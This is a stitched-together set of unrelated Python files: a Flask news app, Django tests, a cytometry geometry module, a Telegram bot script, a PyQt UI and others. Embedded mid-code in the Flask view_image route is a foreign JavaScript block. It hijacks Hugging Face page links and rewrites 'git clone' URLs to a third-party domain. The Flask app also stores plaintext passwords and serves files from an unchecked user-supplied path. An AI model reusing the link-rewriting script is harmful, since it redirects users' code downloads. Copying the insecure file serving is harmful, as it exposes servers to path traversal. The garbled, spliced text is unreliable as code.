request.form['password']!=request.form['<PASSWORD>']: flash('Password is not matching','error') return render_template('new.html') else: tb_log = tb_login1(username=request.form['username'], password=request.form['password'], city=request.form['city']) db.session.add(tb_log) db.session.commit() flash('Record was successfully added') return redirect(url_for('show_all')) return render_template('new.html') @app.route('/upload_news', methods = ['GET', 'POST']) def upload_news(): return render_template('upload_news.html') @app.route('/uploader', methods=['GET','POST']) def upload_file(): if request.method == 'POST': file =request.files['file'] f = os.path.join(file.filename) print (os.path.join(file.filename)) f = request.files['file'] file.save(os.path.join(app.config['UPLOAD_FOLDER'],str(session['tid'])+session['susername']+file.filename)) tb_up = tb_uploads3(imagename=str(session['tid'])+session['susername']+file.filename,Caption=request.form['caption'], Content=request.form['content'],Category=request.form['category'],DateTime=datetime.now(), city=session['scity'],Uploadedby=session['susername'],valid='no') q=tb_temp2(id=session['tid']+1) db.session.add(q) db.session.add(tb_up) db.session.commit() session['tid']=session['tid']+1 flash('Record was successfully added') return redirect(url_for('home',susername=session['susername'],scity=session['scity'])) @app.route('/update_profile', methods = ['GET', 'POST']) def update_profile(): if request.method == 'POST': if not request.form['username'] or not request.form['password']: flash('Please enter all the fields', 'error') else: s=tb_login1.query.all() for x in s: if request.form["username"]==x.username: x.city=request.form['city'] x.password=request.form['password'] db.session.commit() flash('Record was successfully added') return redirect(url_for('show_all')) #else: #return render_template("update_profile.html") return render_template('update_profile.html') @app.route('/view_image/<imagepath>',methods = ['GET', 'POST']) def view_image(imagepath): #print("<html><body><input type='button' text='back' onclick='home.html'> <script> // 客户端DOM加载后执行替换 (function() { // 只替换页面顶部的标志性元素 function replaceHeaderBranding() { // 查找顶部导航栏中的Hugging Face文本并替换 document.querySelectorAll('a[href="/"]').forEach(link => { // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'GitHub加速' && linkText !== 'GitHub加速' ) { link.textContent = 'GitHub加速'; link.href = 'https://githubproxy.cc'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== 'Vibevoice' ) { link.textContent = 'Vibevoice'; link.href = 'https://vibevoice.info/'; replacedLinks.add(link); } // 替换Pricing链接 - 仅替换一次 else if ( (linkHref.includes('/pricing') || linkHref === '/pricing' || linkText === 'Pricing' || linkText.match(/^s*Pricings*$/i)) && linkText !== 'VoxCPM' ) { link.textContent = 'VoxCPM'; link.href = 'https://voxcpm.net/'; replacedLinks.add(link); } // 替换Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) && linkText !== 'IndexTTS2' ) { link.textContent = 'IndexTTS2'; link.href = 'https://vibevoice.info/indextts2'; replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'GitHub加速'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); </script> </body></html>") #return send_file('/home/krunal/projects/news/FlaskWebProject1/uploads'+imagepath, attachment_filename=imagepath) return send_file('/home/krunal/projects/news/FlaskWebProject1/uploads/'+imagepath,attachment_filename=imagepath) @app.route('/Logout') def Logout(): #session.clear() session['susername']='z' #return render_template('Login.html') return redirect(url_for('Login')) @app.route('/Save/<imagepath>',methods = ['GET', 'POST']) def Save(imagepath): rendered=render_template('save.html',imagepath=imagepath,tb_uploads3=tb_uploads3.query.all()) #rendered = render_template('downloads.html') pdf=pdfkit.from_string(rendered,False,configuration=config) response = make_response(pdf) response.headers['Content-Type']= 'application/pdf' response.headers['Content-Disposition'] = 'attachment; filename=news.pdf' return response if __name__ == '__main__': db.create_all() app.run(debug = True)from flask import Blueprint, render_template site = Blueprint( "site", __name__, url_prefix="/", static_url_path="", static_folder="static", template_folder="templates", ) @site.route("/") def index(): return render_template("index.html") @site.route("/about") def about(): return render_template("about.html") @site.route("/work") def work(): return render_template("work.html") @site.route("/work-single") def work_single(): return render_template("work-single.html") @site.route("/pricing") def pricing(): return render_template("pricing.html") @site.route("/contact") def contact(): return render_template("contact.html") # -*- coding: utf-8 -*- """Test views to run actions.""" import os from django.conf import settings from django.urls import reverse from rest_framework import status from ontask import tests from ontask.action.views import action_import class ActionViewExport(tests.OnTaskTestCase): """Test the view to run actio item filter, json and email.""" fixtures = ['simple_workflow_two_actions'] filename = os.path.join( settings.ONTASK_FIXTURE_DIR, 'simple_workflow_two_actions.sql') user_email = '<EMAIL>' user_pwd = '<PASSWORD>' workflow_name = 'wflow2' def test_export_ask(self): """Test the export views.""" action = self.workflow.actions.get(name='Detecting age') resp = self.get_response( 'workflow:export_list_ask', {'wid': action.workflow.id}) self.assertTrue(status.is_success(resp.status_code)) self.assertTrue(action.name in str(resp.content)) # Get export done # BROKEN!!! resp = self.get_response( 'workflow:export_list_ask', {'wid': action.workflow.id}, method='POST', req_params={'select_0': True}) self.assertTrue(status.is_success(resp.status_code)) self.assertTrue('Your download will start ' in str(resp.content)) # Get export download resp = self.get_response( 'action:export', {'pklist': str(action.id)}) self.assertTrue(status.is_success(resp.status_code)) self.assertEqual(resp['Content-Type'], 'application/octet-stream') def test_action_import(self): """Test the import .""" # Get request resp = self.get_response( 'action:import') self.assertTrue(status.is_success(resp.status_code)) self.assertTrue('File containing a previously' in str(resp.content)) file_obj = open( os.path.join( settings.BASE_DIR(), 'lib', 'surveys', 'spq_survey.gz'), 'rb') # Post request req = self.factory.post( reverse('action:import'), {'upload_file': file_obj}) req.META['HTTP_ACCEPT_ENCODING'] = 'gzip, deflate' req.FILES['upload_file'].content_type = 'application/x-gzip' req = self.add_middleware(req) resp = action_import(req) self.assertEqual(resp.status_code, status.HTTP_302_FOUND) # Fails if the action is not there self.workflow.actions.get(name='SPQ') #!/usr/bin.env/python # -*- coding: utf-8 -*- """ For the purpose of cytometry analysis we often think of a population of cells as having a particular phenotype that can be identified by sub-setting cells in one or two dimensional space. This results in geometric objects that define a population. This module houses the functionality around those geometric objects. Copyright 2020 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from ..flow import transform import numpy as np import pandas as pd from multiprocessing import Pool, cpu_count from warnings import warn from functools import partial from matplotlib.patches import Ellipse from scipy import linalg, stats from scipy.spatial.qhull import ConvexHull, QhullError from shapely.geometry import Polygon, Point import mongoengine __author__ = "<NAME>" __copyright__ = "Copyright 2020, cytopy" __credits__ = ["<NAME>", "<NAME>", "<NAME>", "<NAME>"] __license__ = "MIT" __version__ = "2.0.0" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" class PopulationGeometry(mongoengine.EmbeddedDocument): """ Geometric shape generated by non-threshold generating Gate Attributes ----------- x: str Name of the X-dimension e.g. CD3, FSC-A etc y: str Name of the Y-dimension e.g. CD3, FSC-A etc transform_x: str Transformation method applied to the x-axis transform_y: str Transformation method applied to the y-axis transform_x_kwargs: dict Transformation keyword arguments for transform method applied to the x-axis transform_y_kwargs: str Transformation keyword arguments for transform method applied to the y-axis """ x = mongoengine.StringField() y = mongoengine.StringField() transform_x = mongoengine.StringField() transform_y = mongoengine.StringField() transform_x_kwargs = mongoengine.DictField() transform_y_kwargs = mongoengine.DictField() meta = {'allow_inheritance': True} class ThresholdGeom(PopulationGeometry): """ Threshold shape. Inherits from PopulationGeometry. Attributes ----------- x_threshold: float Threshold applied to the X-axis y_threshold: float Threshold applied to the Y-axis """ x_threshold = mongoengine.FloatField() y_threshold = mongoengine.FloatField() def transform_to_linear(self): """ Thresholds are transformed to their equivalent value in linear space according to the transform defined. If transform is None, thresholds are returned as saved. Returns ------- float, float """ x, y = self.x_threshold, self.y_threshold if self.transform_x: kwargs = self.transform_x_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_x)(**kwargs) x = transformer.inverse_scale(pd.DataFrame({"x": [self.x_threshold]}), features=["x"])["x"].values[0] if self.transform_y: kwargs = self.transform_y_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_y)(**kwargs) y = transformer.inverse_scale(pd.DataFrame({"y": [self.y_threshold]}), features=["y"])["y"].values[0] return x, y class PolygonGeom(PopulationGeometry): """ Polygon shape. Inherits from PopulationGeometry. Attributes ----------- x_values: list X-axis coordinates y_values: list Y-axis coordinates """ x_values = mongoengine.ListField() y_values = mongoengine.ListField() @property def shape(self): assert self.x_values is not None and self.y_values is not None, \ "x and y values not defined for this Polygon" return create_polygon(self.x_values, self.y_values) def transform_to_linear(self): """ x,y coordinates are transformed to their equivalent value in linear space according to the transform defined. If transform is None, coordinates are returned as saved. Returns ------- numpy.ndarray, numpy.ndarray """ x_values, y_values = self.x_values, self.y_values if self.transform_x: kwargs = self.transform_x_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_x)(**kwargs) x_values = transformer.inverse_scale(pd.DataFrame({"x": self.x_values}), features=["x"])["x"].values if self.transform_y: kwargs = self.transform_y_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_y)(**kwargs) y_values = transformer.inverse_scale(pd.DataFrame({"y": self.y_values}), features=["y"])["y"].values return x_values, y_values def point_in_poly(coords: np.array, poly: Polygon): point = Point(coords) return poly.contains(point) def inside_polygon(df: pd.DataFrame, x: str, y: str, poly: Polygon, njobs: int = -1): """ Return rows in dataframe who's values for x and y are contained in some polygon coordinate shape Parameters ---------- df: Pandas.DataFrame Data to query x: str name of x-axis plane y: str name of y-axis plane poly: shapely.geometry.Polygon Polygon object to search njobs: int Number of jobs to run in parallel, by default uses all available cores Returns -------- Pandas.DataFrame Masked DataFrame containing only those rows that fall within the Polygon """ if njobs < 0: njobs = cpu_count() xy = df[[x, y]].values f = partial(point_in_poly, poly=poly) with Pool(njobs) as pool: mask = list(pool.map(f, xy)) return df.iloc[mask] def polygon_overlap(poly1: Polygon, poly2: Polygon, threshold: float = 0.): """ Compare the area of two polygons and give the fraction overlap. If fraction overlap does not exceed given threshold or the polygon's do not overlap, return 0.0 Parameters ---------- poly1: Polygon poly2: Polygon threshold: float (default = 0.0) Returns ------- float """ if poly1.intersects(poly2): overlap = float(poly1.intersection(poly2).area / poly1.area) if overlap >= threshold: return overlap return 0. def create_polygon(x: list, y: list): """ Given a list of x coordinated and a list of y coordinates, generate a shapely Polygon Parameters ---------- x: list y: list Returns ------- Polygon """ return Polygon([(x, y) for x, y in zip(x, y)]) def inside_ellipse(data: np.array, center: tuple, width: int or float, height: int or float, angle: int or float) -> object: """ Return mask of two dimensional matrix specifying if a data point (row) falls within an ellipse Parameters ----------- data: numpy.ndarray two dimensional matrix (x,y) center: tuple x,y coordinate corresponding to center of elipse width: int or float semi-major axis of eplipse height: int or float semi-minor axis of elipse angle: int or float angle of ellipse Returns -------- numpy.ndarray numpy array of indices for values inside specified ellipse """ cos_angle = np.cos(np.radians(180. - angle)) sin_angle = np.sin(np.radians(180. - angle)) x = data[:, 0] y = data[:, 1] xc = x - center[0] yc = y - center[1] xct = xc * cos_angle - yc * sin_angle yct = xc * sin_angle + yc * cos_angle rad_cc = (xct ** 2 / (width / 2.) ** 2) + (yct ** 2 / (height / 2.) ** 2) in_ellipse = [] for r in rad_cc: if r <= 1.: # point in ellipse in_ellipse.append(True) else: # point not in ellipse in_ellipse.append(False) return in_ellipse def probablistic_ellipse(covariances: np.array, conf: float): """ Given the covariance matrix of a mixture component, calculate a elliptical shape that represents a probabilistic confidence interval. Parameters ---------- covariances: np.array Covariance matrix conf: float The confidence interval (e.g. 0.95 would give the region of 95% confidence) Returns ------- float and float and float Width, Height and Angle of ellipse """ eigen_val, eigen_vec = linalg.eigh(covariances) chi2 = stats.chi2.ppf(conf, 2) eigen_val = 2. * np.sqrt(eigen_val) * np.sqrt(chi2) u = eigen_vec[0] / linalg.norm(eigen_vec[0]) angle = 180. * np.arctan(u[1] / u[0]) / np.pi return eigen_val[0], eigen_val[1], (180. + angle) def create_convex_hull(x_values: np.array, y_values: np.array): """ Given the x and y coordinates of a cloud of data points, generate a convex hull, returning the x and y coordinates of its vertices. Parameters ---------- x_values: numpy.ndarray y_values: numpy.ndarray Returns ------- numpy.ndarray, numpy.ndarray """ xy = np.array([[i[0], i[1]] for i in zip(x_values, y_values)]) try: hull = ConvexHull(xy, incremental=True) x = [float(i) for i in xy[hull.vertices, 0]] y = [float(i) for i in xy[hull.vertices, 1]] except QhullError: warn("ConvexHull generated QhullError; cannot generate geometry") x, y = [], [] return x, y def ellipse_to_polygon(centroid: (float, float), width: float, height: float, angle: float, ellipse: Ellipse or None = None): """ Convert an ellipse to a shapely Polygon object. Parameters ---------- centroid: (float, float) width: float height: float angle: float ellipse: Ellipse (optional) Returns ------- Polygon """ ellipse = ellipse or Ellipse(centroid, width, height, angle) vertices = ellipse.get_verts() return Polygon(vertices) from re import search import uuid import datetime import os import json from urllib.parse import quote_plus, urlparse import time import requests from lxml.html import fromstring from peewee import * import peeweedbevolve from telegram_bot.auth import hotp from telegram_bot.models import User, Link, Map, Message DB_NAME = "walid_test" DB_USER = os.environ.get("DBUSER", None) DB_PASS = os.environ.get("DBPASS", None) DB_HOST = os.environ.get("DBHOST", None) db = PostgresqlDatabase( DB_NAME, # Required by Peewee. user=DB_USER, # Will be passed directly to psycopg2. password=<PASSWORD>, # Ditto. host=DB_HOST, # Ditto. ) db.get_conn() def urlNormalize(url): if not search(r'http', url): return "http://" + url else: return url def fake_user(): user, created = User.get_or_create(telegramId=0, username = "yabir", defaults={"authCode":0, "secret":uuid.uuid4(), "pocket_configured":False}) return user def start(): print("Starting creation of tables in " + str(DB_NAME)) db.evolve([User, Link, Map, Message]) print("Tables created") def me(u="yabir"): user = fake_user() time = int(datetime.datetime.now().timestamp()) q = User.update(authCode=time).where(User.username==u) num_of_row = q.execute() code = hotp.at(time) print ("Access to " + "http://walid.yabirgb.com" +"/secret/" + str(user.secret) + "/" + str(code)) def store_url(url): user = fake_user() r = requests.get(urlNormalize(url)) tree = fromstring(r.content) title = str(tree.findtext('.//title')) final_url = r.url Link.create(url=final_url, title=title, user = user, date =datetime.datetime.now(), private = True) print("Link saved!") if __name__ == '__main__': import sys if sys.argv[1] == "fake": fake_user() elif sys.argv[1] == "me": me() elif sys.argv[1] == "start": start() elif sys.argv[1] == "save": store_url(sys.argv[2]) <reponame>biobenkj/scanorama<filename>bin/dendritic.py import numpy as np from process import load_names, merge_datasets from scanorama import process_data, find_alignments_table from time_align import time_align_correlate, time_align_visualize NAMESPACE = 'dendritic' data_names = [ 'data/dendritic/unstimulated', 'data/dendritic/unstimulated_repl', 'data/dendritic/lps_1h', 'data/dendritic/lps_2h', 'data/dendritic/lps_4h', 'data/dendritic/lps_4h_repl', 'data/dendritic/lps_6h', ] if __name__ == '__main__': datasets, genes_list, n_cells = load_names(data_names) datasets, genes = merge_datasets(datasets, genes_list) datasets_dimred, genes = process_data(datasets, genes) _, A, _ = find_alignments_table(datasets_dimred) time = np.array([ 0, 0, 1, 2, 4, 4, 6 ]).reshape(-1, 1) time_align_correlate(A, time) x = np.array([ 0, 0, 1, 2, 3, 3, 4 ]).reshape(-1, 1) y = [ -.1, .1, 0, 0, -.1, .1, 0 ] time_align_visualize(A, x, y, namespace=NAMESPACE) import os import shutil import sys print("Welcome to file sort\nEnter 0 in any prompt to exit\nBasic ideas of files and file extensions are necessary for operation of the program") status='not ok' while(status=='not ok'): directory=str(input("Enter the location to be sorted:"))+os.sep if directory ==("0"+os.sep): sys.exit("Termination!!!") filename=os.listdir(directory) status='ok' if not filename: status='not ok' print("The folder doesn't exist!!Check the input and try again...\n0 for termination") f= [] for (dirpath, dirnames, filenames) in os.walk(directory): f.extend(filenames) break for i in range(len(filenames)): name,exten=os.path.splitext(filenames[i]) if(os.path.exists(directory+exten[1:])): shutil.move(directory+filenames[i],directory+exten[1:]) else: os.mkdir(directory+exten[1:]) shutil.move(directory+filenames[i],directory+exten[1:]) <filename>examples/sync/connect_and_authorize.py from openstuder import SIGatewayClient, SIProtocolError host = 'localhost' user = 'garfield' password = '<PASSWORD>' client = SIGatewayClient() try: access_level = client.connect(host, user=user, password=password) except SIProtocolError as error: print(f'Unable to connect: {error.reason()}') quit(1) print(f'Connected, access level = {access_level}, gateway runs version {client.gateway_version()}')<filename>qt_view.py # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'qt_view.ui' # # Created by: PyQt5 UI code generator 5.15.2 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(800, 600) MainWindow.setAcceptDrops(True) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.delButton = QtWidgets.QPushButton(self.centralwidget) self.delButton.setGeometry(QtCore.QRect(110, 10, 91, 71)) self.delButton.setMinimumSize(QtCore.QSize(91, 0)) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap("UI/cancel.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.delButton.setIcon(icon) self.delButton.setIconSize(QtCore.QSize(32, 32)) self.delButton.setObjectName("delButton") self.openButton = QtWidgets.QPushButton(self.centralwidget) self.openButton.setGeometry(QtCore.QRect(10, 10, 91, 71)) self.openButton.setMinimumSize(QtCore.QSize(81, 0)) icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap("UI/add.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.openButton.setIcon(icon1) self.openButton.setIconSize(QtCore.QSize(32, 32)) self.openButton.setObjectName("openButton") self.downloadImgCheckBox = QtWidgets.QCheckBox(self.centralwidget) self.downloadImgCheckBox.setGeometry(QtCore.QRect(310, 20, 73, 16)) self.downloadImgCheckBox.setObjectName("downloadImgCheckBox") self.tableWidget = QtWidgets.QTableWidget(self.centralwidget) self.tableWidget.setGeometry(QtCore.QRect(20, 100, 781, 451)) self.tableWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn) self.tableWidget.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn) self.tableWidget.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows) self.tableWidget.setShowGrid(True) self.tableWidget.setGridStyle(QtCore.Qt.SolidLine) self.tableWidget.setWordWrap(True) self.tableWidget.setCornerButtonEnabled(True) self.tableWidget.setRowCount(0) self.tableWidget.setColumnCount(1) self.tableWidget.setObjectName("tableWidget") item = QtWidgets.QTableWidgetItem() self.tableWidget.setHorizontalHeaderItem(0, item) self.tableWidget.horizontalHeader().setHighlightSections(True) self.tableWidget.horizontalHeader().setSortIndicatorShown(False) self.tableWidget.horizontalHeader().setStretchLastSection(True) self.tableWidget.verticalHeader().setStretchLastSection(False) self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(700, 80, 81, 21)) self.label.setObjectName("label") self.runButton = QtWidgets.QPushButton(self.centralwidget) self.runButton.setGeometry(QtCore.QRect(210, 10, 91, 71)) self.runButton.setMinimumSize(QtCore.QSize(91, 0)) icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap("UI/play.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.runButton.setIcon(icon2) self.runButton.setIconSize(QtCore.QSize(32, 32)) self.runButton.setObjectName("runButton") self.formatStr = QtWidgets.QLineEdit(self.centralwidget) self.formatStr.setGeometry(QtCore.QRect(360, 40, 341, 21)) self.formatStr.setObjectName("formatStr") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(310, 40, 47, 21)) self.label_2.setObjectName("label_2") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(310, 60, 461, 21)) self.label_3.setObjectName("label_3") self.setDefaultBtn = QtWidgets.QPushButton(self.centralwidget) self.setDefaultBtn.setGeometry(QtCore.QRect(710, 40, 75, 21)) self.setDefaultBtn.setObjectName("setDefaultBtn") MainWindow.setCentralWidget(self.centralwidget) self.menubar = QtWidgets.QMenuBar(MainWindow) self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21)) self.menubar.setObjectName("menubar") self.menu = QtWidgets.QMenu(self.menubar) self.menu.setObjectName("menu") self.menu_2 = QtWidgets.QMenu(self.menubar) self.menu_2.setObjectName("menu_2") self.menu_3 = QtWidgets.QMenu(self.menubar) self.menu_3.setObjectName("menu_3") MainWindow.setMenuBar(self.menubar) self.statusbar = QtWidgets.QStatusBar(MainWindow) self.statusbar.setObjectName("statusbar") MainWindow.setStatusBar(self.statusbar) self.action1 = QtWidgets.QAction(MainWindow) self.action1.setObjectName("action1") self.action3 = QtWidgets.QAction(MainWindow) self.action3.setObjectName("action3") self.action2 = QtWidgets.QAction(MainWindow) self.action2.setObjectName("action2") self.action4 = QtWidgets.QAction(MainWindow) self.action4.setObjectName("action4") self.action5 = QtWidgets.QAction(MainWindow) self.action5.setObjectName("action5") self.menu.addAction(self.action3) self.menu.addAction(self.action4) self.menu_2.addAction(self.action1) self.menu_3.addAction(self.action2) self.menu_3.addAction(self.action5) self.menubar.addAction(self.menu_2.menuAction()) self.menubar.addAction(self.menu_3.menuAction()) self.menubar.addAction(self.menu.menuAction()) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Odvrt")) self.delButton.setText(_translate("MainWindow", "刪除全部")) self.openButton.setText(_translate("MainWindow", "開啟")) self.downloadImgCheckBox.setText(_translate("MainWindow", "下載縮圖")) self.tableWidget.setSortingEnabled(False) item = self.tableWidget.horizontalHeaderItem(0) item.setText(_translate("MainWindow", "檔案路徑")) self.label.setText(_translate("MainWindow", "共0個檔案")) self.runButton.setText(_translate("MainWindow", "執行")) self.formatStr.setText(_translate("MainWindow", "%code %title %actor")) self.label_2.setText(_translate("MainWindow", "檔名格式")) self.label_3.setText(_translate("MainWindow", "番號 code | 片名 title | 演員 actor | 發售日 release_date | 片長 volume | 評分 rating | 分類 genres")) self.setDefaultBtn.setText(_translate("MainWindow", "使用預設值")) self.menu.setTitle(_translate("MainWindow", "關於")) self.menu_2.setTitle(_translate("MainWindow", "檔案")) self.menu_3.setTitle(_translate("MainWindow", "選項")) self.action1.setText(_translate("MainWindow", "開啟")) self.action3.setText(_translate("MainWindow", "作者")) self.action3.setToolTip(_translate("MainWindow", "作者")) self.action2.setText(_translate("MainWindow", "執行")) self.action4.setText(_translate("MainWindow", "關於此程式")) self.action5.setText(_translate("MainWindow", "刪除全部")) <filename>giggle/__init__.py # from .giggle import Giggle __version__ = "0.1.1" <reponame>blaa/orgassist<gh_stars>10-100 import random import io import datetime as dt import pytz import unittest import jinja2 from orgassist.calendar import DateType from . import orgnode from . import helpers # Example Org file for testing # pre-generated to have a todays 